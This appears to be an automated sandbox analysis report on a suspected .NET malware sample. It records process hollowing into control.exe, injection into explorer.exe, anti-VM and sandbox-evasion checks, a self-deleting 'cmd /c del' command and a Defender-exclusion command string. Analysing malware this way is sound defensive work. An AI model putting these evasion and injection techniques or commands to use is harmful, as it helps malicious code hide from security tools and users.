            Source: C:\Users\user\Desktop\iAuPyHuUkk.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5900:120:WilError_01
            Source: C:\Windows\explorer.exe File read: C:\Windows\System32\drivers\etc\hosts
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exe File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
            Source: iAuPyHuUkk.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
            Source: iAuPyHuUkk.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
            Source: Binary string: wntdll.pdbUGP source: iAuPyHuUkk.exe, 00000003.00000002.454469053.000000000171F000.00000040.00000001.sdmp, control.exe, 0000000D.00000002.620584407.0000000004B70000.00000040.00000001.sdmp
            Source: Binary string: control.pdb source: iAuPyHuUkk.exe, 00000003.00000002.456307585.0000000003630000.00000040.00020000.sdmp
            Source: Binary string: wntdll.pdb source: iAuPyHuUkk.exe, 00000003.00000002.454469053.000000000171F000.00000040.00000001.sdmp, control.exe
            Source: Binary string: control.pdbUGP source: iAuPyHuUkk.exe, 00000003.00000002.456307585.0000000003630000.00000040.00020000.sdmp

            Data Obfuscation:

            .NET source code contains potential unpacker
            Source: iAuPyHuUkk.exe, MapEditor1/CreateMapDialog.cs.Net Code: Marshaler System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
            Source: 0.2.iAuPyHuUkk.exe.f00000.0.unpack, MapEditor1/CreateMapDialog.cs.Net Code: Marshaler System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
            Source: 0.0.iAuPyHuUkk.exe.f00000.0.unpack, MapEditor1/CreateMapDialog.cs.Net Code: Marshaler System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
            Source: 3.2.iAuPyHuUkk.exe.bc0000.1.unpack, MapEditor1/CreateMapDialog.cs.Net Code: Marshaler System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
            Source: 3.0.iAuPyHuUkk.exe.bc0000.0.unpack, MapEditor1/CreateMapDialog.cs.Net Code: Marshaler System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exe Code function: 0_2_01A42018 push ebx; retf 0_2_01A4207A
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exe Code function: 0_2_064D1450 push es; ret 0_2_064D1460
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exe Code function: 0_2_064D14CD push es; iretd 0_2_064D14D4
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exe Code function: 0_2_064D3E6D push FFFFFF8Bh; iretd 0_2_064D3E6F
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exe Code function: 0_2_064D3E76 push es; ret 0_2_064D3E77
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exe Code function: 0_2_064D1CE0 push eax; retf 0_2_064D1CE1
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exe Code function: 3_2_0041B832 push eax; ret 3_2_0041B838
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exe Code function: 3_2_0041B83B push eax; ret 3_2_0041B8A2
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exe Code function: 3_2_0041B89C push eax; ret 3_2_0041B8A2
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exe Code function: 3_2_0041C2A5 push dword ptr [A265E993h]; ret 3_2_0041C6CF
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exe Code function: 3_2_004154CF push es; iretd 3_2_004154D0
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exe Code function: 3_2_00413D9D push ecx; retf 3_2_00413D9E
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exe Code function: 3_2_0041B7E5 push eax; ret 3_2_0041B838
            Source: C:\Windows\SysWOW64\control.exe Code function: 13_2_04BED0D1 push ecx; ret 13_2_04BED0E4
            Source: C:\Windows\SysWOW64\control.exe Code function: 13_2_009CB89C push eax; ret 13_2_009CB8A2
            Source: C:\Windows\SysWOW64\control.exe Code function: 13_2_009CB83B push eax; ret 13_2_009CB8A2
            Source: C:\Windows\SysWOW64\control.exe Code function: 13_2_009CB832 push eax; ret 13_2_009CB838
            Source: C:\Windows\SysWOW64\control.exe Code function: 13_2_009C54CF push es; iretd 13_2_009C54D0
            Source: C:\Windows\SysWOW64\control.exe Code function: 13_2_009C3D9D push ecx; retf 13_2_009C3D9E
            Source: C:\Windows\SysWOW64\control.exe Code function: 13_2_009CBDB1 push ecx; ret 13_2_009CBDB4
            Source: C:\Windows\SysWOW64\control.exe Code function: 13_2_009CC6A5 push dword ptr [A265E993h]; ret 13_2_009CC6CF
            Source: C:\Windows\SysWOW64\control.exe Code function: 13_2_009CB7E5 push eax; ret 13_2_009CB838
            Source: C:\Windows\SysWOW64\control.exe Code function: 13_2_009CBF1E push 00000015h; iretd 13_2_009CBF20
            Source: C:\Windows\SysWOW64\control.exe Code function: 13_2_009CBF2F push es; iretd 13_2_009CBF30
            Source: initial sample Static PE information: section name: .text entropy: 7.86255981519

            Hooking and other Techniques for Hiding and Protection:

            Self deletion via cmd delete
            Source: C:\Windows\SysWOW64\control.exe Process created: /c del 'C:\Users\user\Desktop\iAuPyHuUkk.exe'
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exe Process information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\control.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

            Malware Analysis System Evasion:

            Yara detected AntiVM3
            Source: Yara match File source: 0.2.iAuPyHuUkk.exe.33e3150.1.raw.unpack, type: UNPACKEDPE
            Source: Yara match File source: 0.2.iAuPyHuUkk.exe.34116cc.2.raw.unpack, type: UNPACKEDPE
            Source: Yara match File source: 00000000.00000002.370703013.00000000033F7000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara match File source: 00000000.00000002.370638895.00000000033C1000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara match File source: Process Memory Space: iAuPyHuUkk.exe PID: 476, type: MEMORYSTR
            Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
            Source: iAuPyHuUkk.exe, 00000000.00000002.370703013.00000000033F7000.00000004.00000001.sdmp Binary or memory string: SBIEDLL.DLL
            Source: iAuPyHuUkk.exe, 00000000.00000002.370703013.00000000033F7000.00000004.00000001.sdmp Binary or memory string: KERNEL32.DLL.WINE_GET_UNIX_FILE_NAME
            Tries to detect virtualization through RDTSC time measurements
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exe RDTSC instruction interceptor: First address: 0000000000408614 second address: 000000000040861A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exe RDTSC instruction interceptor: First address: 00000000004089AE second address: 00000000004089B4 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
            Source: C:\Windows\SysWOW64\control.exe RDTSC instruction interceptor: First address: 00000000009B8614 second address: 00000000009B861A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
            Source: C:\Windows\SysWOW64\control.exe RDTSC instruction interceptor: First address: 00000000009B89AE second address: 00000000009B89B4 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exe TID: 580 Thread sleep time: -32918s >= -30000s
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exe TID: 5528 Thread sleep time: -922337203685477s >= -30000s
            Source: C:\Windows\SysWOW64\control.exe TID: 7072 Thread sleep time: -32000s >= -30000s
            Source: C:\Windows\explorer.exe Last function: Thread delayed
            Source: C:\Windows\SysWOW64\control.exe Last function: Thread delayed
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exe Code function: 3_2_004088E0 rdtsc 3_2_004088E0
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exe Thread delayed: delay time: 922337203685477
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exe Process information queried: ProcessInformation
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exe Thread delayed: delay time: 32918
            Source: iAuPyHuUkk.exe, 00000000.00000002.370703013.00000000033F7000.00000004.00000001.sdmp Binary or memory string: VMware SVGA IIBAdd-MpPreference -ExclusionPath "
            Source: explorer.exe, 00000005.00000000.424615605.0000000008430000.00000004.00000001.sdmp Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000
            Source: explorer.exe, 00000005.00000000.424529309.00000000083E9000.00000004.00000001.sdmp Binary or memory string: VMware SATA CD00dRom0
            Source: iAuPyHuUkk.exe, 00000000.00000002.370703013.00000000033F7000.00000004.00000001.sdmp Binary or memory string: InstallPathJC:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
            Source: explorer.exe, 00000005.00000000.415338335.00000000062E0000.00000004.00000001.sdmp Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
            Source: iAuPyHuUkk.exe, 00000000.00000002.370703013.00000000033F7000.00000004.00000001.sdmp Binary or memory string: vmware
            Source: explorer.exe, 00000005.00000000.424529309.00000000083E9000.00000004.00000001.sdmp Binary or memory string: VMware SATA CD00
            Source: explorer.exe, 00000005.00000000.393239210.000000000095C000.00000004.00000020.sdmp Binary or memory string: AGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}R
            Source: explorer.exe, 00000005.00000000.400888478.00000000082E2000.00000004.00000001.sdmp Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}>
            Source: explorer.exe, 00000005.00000000.400888478.00000000082E2000.00000004.00000001.sdmp Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000
            Source: explorer.exe, 00000005.00000000.424615605.0000000008430000.00000004.00000001.sdmp Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000-;
            Source: iAuPyHuUkk.exe, 00000000.00000002.370703013.00000000033F7000.00000004.00000001.sdmp Binary or memory string: VMWAREDSOFTWARE\VMware, Inc.\VMware Tools
            Source: explorer.exe, 00000005.00000000.393239210.000000000095C000.00000004.00000020.sdmp Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}G
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exe Process token adjusted: Debug
            Source: C:\Windows\SysWOW64\control.exe Process token adjusted: Debug
            Source: C:\Windows\SysWOW64\control.exe Code function: 13_2_04BCF0BF mov ecx, dword ptr fs:[00000030h] 13_2_04BCF0BF
            Source: C:\Windows\SysWOW64\control.exeCode function: 13_2_04C17794 mov eax, dword ptr fs:[00000030h]13_2_04C17794
            Source: C:\Windows\SysWOW64\control.exeCode function: 13_2_04C17794 mov eax, dword ptr fs:[00000030h]13_2_04C17794
            Source: C:\Windows\SysWOW64\control.exeCode function: 13_2_04C65BA5 mov eax, dword ptr fs:[00000030h]13_2_04C65BA5
            Source: C:\Windows\SysWOW64\control.exeCode function: 13_2_04BCE730 mov eax, dword ptr fs:[00000030h]13_2_04BCE730
            Source: C:\Windows\SysWOW64\control.exeCode function: 13_2_04B94F2E mov eax, dword ptr fs:[00000030h]13_2_04B94F2E
            Source: C:\Windows\SysWOW64\control.exeCode function: 13_2_04B94F2E mov eax, dword ptr fs:[00000030h]13_2_04B94F2E
            Source: C:\Windows\SysWOW64\control.exeCode function: 13_2_04C68B58 mov eax, dword ptr fs:[00000030h]13_2_04C68B58
            Source: C:\Windows\SysWOW64\control.exeCode function: 13_2_04C68F6A mov eax, dword ptr fs:[00000030h]13_2_04C68F6A
            Source: C:\Windows\SysWOW64\control.exeCode function: 13_2_04BC3B7A mov eax, dword ptr fs:[00000030h]13_2_04BC3B7A
            Source: C:\Windows\SysWOW64\control.exeCode function: 13_2_04BC3B7A mov eax, dword ptr fs:[00000030h]13_2_04BC3B7A
            Source: C:\Windows\SysWOW64\control.exeCode function: 13_2_04C6070D mov eax, dword ptr fs:[00000030h]13_2_04C6070D
            Source: C:\Windows\SysWOW64\control.exeCode function: 13_2_04C6070D mov eax, dword ptr fs:[00000030h]13_2_04C6070D
            Source: C:\Windows\SysWOW64\control.exeCode function: 13_2_04C2FF10 mov eax, dword ptr fs:[00000030h]13_2_04C2FF10
            Source: C:\Windows\SysWOW64\control.exeCode function: 13_2_04C2FF10 mov eax, dword ptr fs:[00000030h]13_2_04C2FF10
            Source: C:\Windows\SysWOW64\control.exeCode function: 13_2_04B9DB60 mov ecx, dword ptr fs:[00000030h]13_2_04B9DB60
            Source: C:\Windows\SysWOW64\control.exeCode function: 13_2_04BAFF60 mov eax, dword ptr fs:[00000030h]13_2_04BAFF60
            Source: C:\Windows\SysWOW64\control.exeCode function: 13_2_04C5131B mov eax, dword ptr fs:[00000030h]13_2_04C5131B
            Source: C:\Windows\SysWOW64\control.exeCode function: 13_2_04B9F358 mov eax, dword ptr fs:[00000030h]13_2_04B9F358
            Source: C:\Windows\SysWOW64\control.exeCode function: 13_2_04B9DB40 mov eax, dword ptr fs:[00000030h]13_2_04B9DB40
            Source: C:\Windows\SysWOW64\control.exeCode function: 13_2_04BAEF40 mov eax, dword ptr fs:[00000030h]13_2_04BAEF40
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exe; Process queried: DebugPort
            Source: C:\Windows\SysWOW64\control.exe; Process queried: DebugPort
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exe; Code function: 3_2_00409B50 LdrLoadDll, 3_2_00409B50
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exe; Memory allocated: page read and write | page guard

            HIPS / PFW / Operating System Protection Evasion:

            System process connects to network (likely due to code injection or exploit)
            Sample uses process hollowing technique
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exe; Section unmapped: C:\Windows\SysWOW64\control.exe base address: D20000
            Maps a DLL or memory area into another process
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exe; Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exe; Section loaded: unknown target: C:\Windows\SysWOW64\control.exe protection: execute and read and write
            Source: C:\Windows\SysWOW64\control.exe; Section loaded: unknown target: C:\Windows\explorer.exe protection: read write
            Source: C:\Windows\SysWOW64\control.exe; Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
            Queues an APC in another process (thread injection)
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exe; Thread APC queued: target process: C:\Windows\explorer.exe
            Modifies the context of a thread in another process (thread injection)
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exe; Thread register set: target process: 3440
            Source: C:\Windows\SysWOW64\control.exe; Thread register set: target process: 3440
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exe; Process created: C:\Users\user\Desktop\iAuPyHuUkk.exe C:\Users\user\Desktop\iAuPyHuUkk.exe
            Source: C:\Windows\SysWOW64\control.exe; Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\iAuPyHuUkk.exe'
            Source: explorer.exe, 00000005.00000000.424529309.00000000083E9000.00000004.00000001.sdmp, control.exe, 0000000D.00000002.619899618.0000000003420000.00000002.00020000.sdmp; Binary or memory string: Shell_TrayWnd
            Source: explorer.exe, 00000005.00000000.393638148.0000000000EE0000.00000002.00020000.sdmp, control.exe, 0000000D.00000002.619899618.0000000003420000.00000002.00020000.sdmp; Binary or memory string: Progman
            Source: explorer.exe, 00000005.00000000.393638148.0000000000EE0000.00000002.00020000.sdmp, control.exe, 0000000D.00000002.619899618.0000000003420000.00000002.00020000.sdmp; Binary or memory string: &Program Manager
            Source: explorer.exe, 00000005.00000000.393638148.0000000000EE0000.00000002.00020000.sdmp, control.exe, 0000000D.00000002.619899618.0000000003420000.00000002.00020000.sdmp; Binary or memory string: Progmanlock
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exe; Queries volume information: C:\Users\user\Desktop\iAuPyHuUkk.exe VolumeInformation
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exe; Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exe; Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Deployment\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Deployment.dll VolumeInformation
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exe; Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exe; Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeQueries volume information: C:\Windows\Fonts\BASKVILL.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeQueries volume information: C:\Windows\Fonts\BAUHS93.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeQueries volume information: C:\Windows\Fonts\BELL.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeQueries volume information: C:\Windows\Fonts\BELLI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeQueries volume information: C:\Windows\Fonts\BELLB.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeQueries volume information: C:\Windows\Fonts\BRLNSR.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeQueries volume information: C:\Windows\Fonts\BRLNSDB.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeQueries volume information: C:\Windows\Fonts\BRLNSB.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeQueries volume information: C:\Windows\Fonts\BERNHC.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeQueries volume information: C:\Windows\Fonts\BOD_PSTC.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeQueries volume information: C:\Windows\Fonts\BRITANIC.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeQueries volume information: C:\Windows\Fonts\BROADW.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeQueries volume information: C:\Windows\Fonts\BRUSHSCI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeQueries volume information: C:\Windows\Fonts\CALIFR.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeQueries volume information: C:\Windows\Fonts\CALIFI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeQueries volume information: C:\Windows\Fonts\CALIFB.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeQueries volume information: C:\Windows\Fonts\CENTAUR.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeQueries volume information: C:\Windows\Fonts\CHILLER.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeQueries volume information: C:\Windows\Fonts\COLONNA.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeQueries volume information: C:\Windows\Fonts\COOPBL.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeQueries volume information: C:\Windows\Fonts\FTLTLT.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeQueries volume information: C:\Windows\Fonts\HARLOWSI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeQueries volume information: C:\Windows\Fonts\HARNGTON.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeQueries volume information: C:\Windows\Fonts\HTOWERT.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeQueries volume information: C:\Windows\Fonts\HTOWERTI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeQueries volume information: C:\Windows\Fonts\JOKERMAN.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeQueries volume information: C:\Windows\Fonts\KUNSTLER.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeQueries volume information: C:\Windows\Fonts\LBRITE.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeQueries volume information: C:\Windows\Fonts\LBRITED.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeQueries volume information: C:\Windows\Fonts\LBRITEI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeQueries volume information: C:\Windows\Fonts\LBRITEDI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeQueries volume information: C:\Windows\Fonts\LCALLIG.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeQueries volume information: C:\Windows\Fonts\LFAX.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeQueries volume information: C:\Windows\Fonts\LFAXD.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeQueries volume information: C:\Windows\Fonts\LFAXI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeQueries volume information: C:\Windows\Fonts\LFAXDI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeQueries volume information: C:\Windows\Fonts\MAGNETOB.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeQueries volume information: C:\Windows\Fonts\MATURASC.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeQueries volume information: C:\Windows\Fonts\MOD20.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeQueries volume information: C:\Windows\Fonts\NIAGENG.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeQueries volume information: C:\Windows\Fonts\NIAGSOL.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeQueries volume information: C:\Windows\Fonts\OLDENGL.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeQueries volume information: C:\Windows\Fonts\ONYX.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeQueries volume information: C:\Windows\Fonts\PARCHM.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeQueries volume information: C:\Windows\Fonts\PLAYBILL.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeQueries volume information: C:\Windows\Fonts\POORICH.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeQueries volume information: C:\Windows\Fonts\RAVIE.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeQueries volume information: C:\Windows\Fonts\INFROMAN.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeQueries volume information: C:\Windows\Fonts\SHOWG.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeQueries volume information: C:\Windows\Fonts\SNAP____.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeQueries volume information: C:\Windows\Fonts\STENCIL.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeQueries volume information: C:\Windows\Fonts\VINERITC.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeQueries volume information: C:\Windows\Fonts\VIVALDII.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeQueries volume information: C:\Windows\Fonts\VLADIMIR.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeQueries volume information: C:\Windows\Fonts\LATINWD.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeQueries volume information: C:\Windows\Fonts\TCM_____.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeQueries volume information: C:\Windows\Fonts\TCMI____.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeQueries volume information: C:\Windows\Fonts\TCB_____.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeQueries volume information: C:\Windows\Fonts\TCBI____.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeQueries volume information: C:\Windows\Fonts\TCCM____.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeQueries volume information: C:\Windows\Fonts\TCCB____.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeQueries volume information: C:\Windows\Fonts\TCCEB.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeQueries volume information: C:\Windows\Fonts\SCRIPTBL.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeQueries volume information: C:\Windows\Fonts\ROCK.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeQueries volume information: C:\Windows\Fonts\ROCKI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeQueries volume information: C:\Windows\Fonts\ROCKB.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeQueries volume information: C:\Windows\Fonts\ROCKEB.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeQueries volume information: C:\Windows\Fonts\ROCKBI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeQueries volume information: C:\Windows\Fonts\ROCC____.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeQueries volume information: C:\Windows\Fonts\ROCCB___.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeQueries volume information: C:\Windows\Fonts\RAGE.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeQueries volume information: C:\Windows\Fonts\PERTILI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeQueries volume information: C:\Windows\Fonts\PERTIBD.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeQueries volume information: C:\Windows\Fonts\PER_____.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeQueries volume information: C:\Windows\Fonts\PERI____.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeQueries volume information: C:\Windows\Fonts\PERB____.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeQueries volume information: C:\Windows\Fonts\PERBI___.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeQueries volume information: C:\Windows\Fonts\PALSCRI.TTF VolumeInformationJump to behavior
